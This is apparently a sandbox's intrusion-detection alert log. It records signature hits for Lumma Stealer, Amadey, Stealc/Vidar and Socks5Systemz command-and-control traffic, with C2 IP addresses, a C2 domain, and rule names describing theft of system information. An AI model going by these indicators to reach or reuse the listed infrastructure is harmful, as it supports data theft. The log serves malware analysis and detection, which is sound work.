2024-11-15T14:10:52.012280+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:56.563564+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50063	104.21.80.55	443	TCP
2024-11-15T14:11:08.676058+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:10.767283+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:20.739604+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:21.795719+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:35.619612+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50154	104.21.80.55	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:29.700115+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:42.130405+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:50.060355+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:11:08.676058+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:20.739604+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50124	104.21.80.55	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:30.949764+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:43.389192+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:52.012280+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:11:10.767283+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:21.795719+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50128	104.21.80.55	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:29.119818+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:30.456945+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:32.033894+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	49950	104.21.80.55	443	TCP
2024-11-15T14:10:33.684895+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	49961	104.21.80.55	443	TCP
2024-11-15T14:10:35.264497+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	49972	104.21.80.55	443	TCP
2024-11-15T14:10:37.511970+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	49983	104.21.80.55	443	TCP
2024-11-15T14:10:40.979850+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50002	104.21.80.55	443	TCP
2024-11-15T14:10:41.585296+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:42.887400+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:44.623138+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50027	104.21.80.55	443	TCP
2024-11-15T14:10:46.036185+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50032	104.21.80.55	443	TCP
2024-11-15T14:10:47.927013+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50044	104.21.80.55	443	TCP
2024-11-15T14:10:48.524637+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50048	104.21.80.55	443	TCP
2024-11-15T14:10:49.449018+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:10:51.489606+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50056	104.21.80.55	443	TCP
2024-11-15T14:10:51.491371+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:53.162264+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50059	104.21.80.55	443	TCP
2024-11-15T14:10:53.378380+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50060	104.21.80.55	443	TCP
2024-11-15T14:10:55.227472+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50062	104.21.80.55	443	TCP
2024-11-15T14:10:56.045904+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50063	104.21.80.55	443	TCP
2024-11-15T14:10:57.131119+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50064	104.21.80.55	443	TCP
2024-11-15T14:11:00.314595+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50074	104.21.80.55	443	TCP
2024-11-15T14:11:03.705405+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:04.809709+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50087	104.21.80.55	443	TCP
2024-11-15T14:11:08.168703+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:10.229783+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:20.081788+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:21.460403+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:23.907790+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50132	104.21.80.55	443	TCP
2024-11-15T14:11:25.691175+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50137	104.21.80.55	443	TCP
2024-11-15T14:11:27.726504+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50140	104.21.80.55	443	TCP
2024-11-15T14:11:30.464211+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50145	104.21.80.55	443	TCP
2024-11-15T14:11:32.697726+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50149	104.21.80.55	443	TCP
2024-11-15T14:11:35.124106+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.4	50154	104.21.80.55	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:49.363443+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50051	185.215.113.16	80	TCP
2024-11-15T14:10:57.518544+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50065	185.215.113.16	80	TCP
2024-11-15T14:11:36.939227+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50157	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:19.629466+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49877	185.215.113.43	80	TCP
2024-11-15T14:10:28.926304+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49927	185.215.113.43	80	TCP
2024-11-15T14:10:38.737531+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49989	185.215.113.43	80	TCP
2024-11-15T14:10:42.696459+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50009	185.215.113.43	80	TCP
2024-11-15T14:10:48.963259+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50049	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:28.395676+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	52934	1.1.1.1	53	UDP
2024-11-15T14:11:16.158294+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	55271	1.1.1.1	53	UDP
2024-11-15T14:11:39.860312+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	62100	1.1.1.1	53	UDP
2024-11-15T14:11:58.728269+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	58211	1.1.1.1	53	UDP
2024-11-15T14:12:21.574788+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	54831	1.1.1.1	53	UDP
2024-11-15T14:12:51.444406+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	53739	1.1.1.1	53	UDP
2024-11-15T14:13:35.601870+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.4	58328	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:08.397783+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:08.391568+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:08.685127+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:09.845624+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:08.692282+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:06.842987+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50750	185.208.158.202	80	TCP
2024-11-15T14:11:14.109241+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:17.265718+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:18.315529+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50121	185.208.158.202	80	TCP
2024-11-15T14:11:19.340795+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50123	185.208.158.202	80	TCP
2024-11-15T14:11:20.391584+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50125	185.208.158.202	80	TCP
2024-11-15T14:11:21.694091+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50127	185.208.158.202	80	TCP
2024-11-15T14:11:22.731846+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50129	185.208.158.202	80	TCP
2024-11-15T14:11:23.803766+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50131	185.208.158.202	80	TCP
2024-11-15T14:11:24.848538+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50133	185.208.158.202	80	TCP
2024-11-15T14:11:25.885986+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:26.303346+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:27.333374+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50139	185.208.158.202	80	TCP
2024-11-15T14:11:29.412761+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50142	185.208.158.202	80	TCP
2024-11-15T14:11:30.454383+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50143	185.208.158.202	80	TCP
2024-11-15T14:11:31.491576+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50146	185.208.158.202	80	TCP
2024-11-15T14:11:32.531881+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50148	185.208.158.202	80	TCP
2024-11-15T14:11:33.840497+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50151	185.208.158.202	80	TCP
2024-11-15T14:11:34.881440+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50153	185.208.158.202	80	TCP
2024-11-15T14:11:35.935800+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50156	185.208.158.202	80	TCP
2024-11-15T14:11:37.389803+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50158	185.208.158.202	80	TCP
2024-11-15T14:11:38.436489+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50160	185.208.158.202	80	TCP
2024-11-15T14:11:39.486368+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50162	185.208.158.202	80	TCP
2024-11-15T14:11:40.525171+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50163	185.208.158.202	80	TCP
2024-11-15T14:11:41.574214+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:42.003672+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:43.563186+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50166	185.208.158.202	80	TCP
2024-11-15T14:11:44.766294+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50168	185.208.158.202	80	TCP
2024-11-15T14:11:45.796735+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50169	185.208.158.202	80	TCP
2024-11-15T14:11:47.058641+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:47.478330+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:48.602771+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50172	185.208.158.202	80	TCP
2024-11-15T14:11:49.741912+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50175	185.208.158.202	80	TCP
2024-11-15T14:11:50.866576+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50176	185.208.158.202	80	TCP
2024-11-15T14:11:51.936796+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50178	185.208.158.202	80	TCP
2024-11-15T14:11:53.056549+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:53.490407+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:54.627653+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50182	185.208.158.202	80	TCP
2024-11-15T14:11:55.696513+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:56.115659+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:57.165798+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:57.598625+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:58.019649+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:59.153743+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:11:59.570488+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:12:00.602012+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50190	185.208.158.202	80	TCP
2024-11-15T14:12:01.667170+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:02.093683+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:03.632226+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50193	185.208.158.202	80	TCP
2024-11-15T14:12:04.664053+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50196	185.208.158.202	80	TCP
2024-11-15T14:12:05.700728+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:06.113804+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:07.147647+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50200	185.208.158.202	80	TCP
2024-11-15T14:12:08.183747+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50201	185.208.158.202	80	TCP
2024-11-15T14:12:09.221572+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:09.630312+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:10.672454+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50204	185.208.158.202	80	TCP
2024-11-15T14:12:11.707826+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50206	185.208.158.202	80	TCP
2024-11-15T14:12:12.824356+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50209	185.208.158.202	80	TCP
2024-11-15T14:12:13.863430+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50210	185.208.158.202	80	TCP
2024-11-15T14:12:14.896052+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50213	185.208.158.202	80	TCP
2024-11-15T14:12:15.936115+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50214	185.208.158.202	80	TCP
2024-11-15T14:12:16.970181+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50216	185.208.158.202	80	TCP
2024-11-15T14:12:18.015550+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50217	185.208.158.202	80	TCP
2024-11-15T14:12:19.060564+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50219	185.208.158.202	80	TCP
2024-11-15T14:12:20.098532+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50220	185.208.158.202	80	TCP
2024-11-15T14:12:21.161791+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50221	185.208.158.202	80	TCP
2024-11-15T14:12:22.201538+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50223	185.208.158.202	80	TCP
2024-11-15T14:12:23.234962+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50224	185.208.158.202	80	TCP
2024-11-15T14:12:24.290699+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50226	185.208.158.202	80	TCP
2024-11-15T14:12:25.333880+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50227	185.208.158.202	80	TCP
2024-11-15T14:12:26.382513+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50228	185.208.158.202	80	TCP
2024-11-15T14:12:27.419709+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50230	185.208.158.202	80	TCP
2024-11-15T14:12:28.683776+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50231	185.208.158.202	80	TCP
2024-11-15T14:12:29.734107+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50234	185.208.158.202	80	TCP
2024-11-15T14:12:30.838905+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50235	185.208.158.202	80	TCP
2024-11-15T14:12:31.889524+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50238	185.208.158.202	80	TCP
2024-11-15T14:12:32.948211+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50239	185.208.158.202	80	TCP
2024-11-15T14:12:34.015369+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50243	185.208.158.202	80	TCP
2024-11-15T14:12:35.135286+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50245	185.208.158.202	80	TCP
2024-11-15T14:12:36.269129+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50248	185.208.158.202	80	TCP
2024-11-15T14:12:37.353922+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50250	185.208.158.202	80	TCP
2024-11-15T14:12:38.443800+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50253	185.208.158.202	80	TCP
2024-11-15T14:12:39.629992+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50256	185.208.158.202	80	TCP
2024-11-15T14:12:40.790128+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50257	185.208.158.202	80	TCP
2024-11-15T14:12:41.917383+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50259	185.208.158.202	80	TCP
2024-11-15T14:12:42.959911+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50260	185.208.158.202	80	TCP
2024-11-15T14:12:43.990763+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50261	185.208.158.202	80	TCP
2024-11-15T14:12:45.022363+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50263	185.208.158.202	80	TCP
2024-11-15T14:12:46.122353+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50264	185.208.158.202	80	TCP
2024-11-15T14:12:47.215602+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50266	185.208.158.202	80	TCP
2024-11-15T14:12:48.276020+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50267	185.208.158.202	80	TCP
2024-11-15T14:12:49.341331+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50271	185.208.158.202	80	TCP
2024-11-15T14:12:50.405299+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50272	185.208.158.202	80	TCP
2024-11-15T14:12:51.464185+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50273	185.208.158.202	80	TCP
2024-11-15T14:12:52.500525+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50275	185.208.158.202	80	TCP
2024-11-15T14:12:53.558650+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50276	185.208.158.202	80	TCP
2024-11-15T14:12:54.586854+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50278	185.208.158.202	80	TCP
2024-11-15T14:12:55.623856+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50279	185.208.158.202	80	TCP
2024-11-15T14:12:56.697827+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50281	185.208.158.202	80	TCP
2024-11-15T14:12:57.740257+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50282	185.208.158.202	80	TCP
2024-11-15T14:12:58.790783+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50283	185.208.158.202	80	TCP
2024-11-15T14:12:59.846970+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50285	185.208.158.202	80	TCP
2024-11-15T14:13:00.899388+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50286	185.208.158.202	80	TCP
2024-11-15T14:13:01.929729+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50288	185.208.158.202	80	TCP
2024-11-15T14:13:02.974611+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50289	185.208.158.202	80	TCP
2024-11-15T14:13:04.018581+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50291	185.208.158.202	80	TCP
2024-11-15T14:13:05.089152+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50293	185.208.158.202	80	TCP
2024-11-15T14:13:06.136791+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50297	185.208.158.202	80	TCP
2024-11-15T14:13:07.183416+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50299	185.208.158.202	80	TCP
2024-11-15T14:13:08.229320+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50301	185.208.158.202	80	TCP
2024-11-15T14:13:09.276405+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50303	185.208.158.202	80	TCP
2024-11-15T14:13:10.333101+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50305	185.208.158.202	80	TCP
2024-11-15T14:13:11.373209+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50306	185.208.158.202	80	TCP
2024-11-15T14:13:12.422655+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50308	185.208.158.202	80	TCP
2024-11-15T14:13:13.491599+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50309	185.208.158.202	80	TCP
2024-11-15T14:13:14.519804+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50311	185.208.158.202	80	TCP
2024-11-15T14:13:15.559079+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50315	185.208.158.202	80	TCP
2024-11-15T14:13:16.639836+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50317	185.208.158.202	80	TCP
2024-11-15T14:13:17.685660+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50318	185.208.158.202	80	TCP
2024-11-15T14:13:18.716927+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50319	185.208.158.202	80	TCP
2024-11-15T14:13:19.743109+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50321	185.208.158.202	80	TCP
2024-11-15T14:13:20.810418+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50322	185.208.158.202	80	TCP
2024-11-15T14:13:21.863536+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50324	185.208.158.202	80	TCP
2024-11-15T14:13:22.908176+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50325	185.208.158.202	80	TCP
2024-11-15T14:13:23.957122+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50326	185.208.158.202	80	TCP
2024-11-15T14:13:25.409256+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50328	185.208.158.202	80	TCP
2024-11-15T14:13:26.462165+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50329	185.208.158.202	80	TCP
2024-11-15T14:13:27.531329+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50331	185.208.158.202	80	TCP
2024-11-15T14:13:28.563722+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50332	185.208.158.202	80	TCP
2024-11-15T14:13:29.600461+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50334	185.208.158.202	80	TCP
2024-11-15T14:13:30.630134+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50335	185.208.158.202	80	TCP
2024-11-15T14:13:31.665188+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50336	185.208.158.202	80	TCP
2024-11-15T14:13:32.702612+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50338	185.208.158.202	80	TCP
2024-11-15T14:13:33.738435+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50339	185.208.158.202	80	TCP
2024-11-15T14:13:34.784168+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50341	185.208.158.202	80	TCP
2024-11-15T14:13:35.820264+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50342	185.208.158.202	80	TCP
2024-11-15T14:13:36.862364+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50343	185.208.158.202	80	TCP
2024-11-15T14:13:37.899410+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50345	185.208.158.202	80	TCP
2024-11-15T14:13:38.932244+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50346	185.208.158.202	80	TCP
2024-11-15T14:13:39.993738+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50347	185.208.158.202	80	TCP
2024-11-15T14:13:41.068024+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50349	185.208.158.202	80	TCP
2024-11-15T14:13:42.561665+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50351	185.208.158.202	80	TCP
2024-11-15T14:13:43.621704+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50352	185.208.158.202	80	TCP
2024-11-15T14:13:44.673400+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50354	185.208.158.202	80	TCP
2024-11-15T14:13:45.720399+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50355	185.208.158.202	80	TCP
2024-11-15T14:13:46.749478+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50356	185.208.158.202	80	TCP
2024-11-15T14:13:47.806924+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50358	185.208.158.202	80	TCP
2024-11-15T14:13:48.863883+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50359	185.208.158.202	80	TCP
2024-11-15T14:13:49.904728+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50361	185.208.158.202	80	TCP
2024-11-15T14:13:50.959178+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50362	185.208.158.202	80	TCP
2024-11-15T14:13:51.983445+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50364	185.208.158.202	80	TCP
2024-11-15T14:13:53.019759+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50365	185.208.158.202	80	TCP
2024-11-15T14:13:54.063931+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50366	185.208.158.202	80	TCP
2024-11-15T14:13:55.116683+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50368	185.208.158.202	80	TCP
